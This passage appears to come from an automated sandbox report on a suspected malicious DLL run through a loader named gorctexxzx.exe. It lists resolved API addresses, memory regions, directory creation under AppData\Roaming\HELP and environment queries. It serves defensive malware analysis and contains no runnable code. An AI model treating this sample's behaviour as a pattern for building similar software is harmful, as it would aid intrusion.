| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95316 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #23: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #23 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb64 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B68
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00150000 | 0x001b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x00287fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002a0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x003dffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003e0000 | 0x003e0000 | 0x004e0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x010effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000010f0000 | 0x010f0000 | 0x0116ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x013bffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:25 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 95394 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #24: gorctexxzx.exe
125
0
| Information | Value |
|---|---|
| ID | #24 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=Entry /fn_args="1" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:32, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:57 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xb70 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B74
0x
DDC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x0026ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0031ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000320000 | 0x00320000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x0050ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000510000 | 0x00510000 | 0x00610fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000760000 | 0x00760000 | 0x0085ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
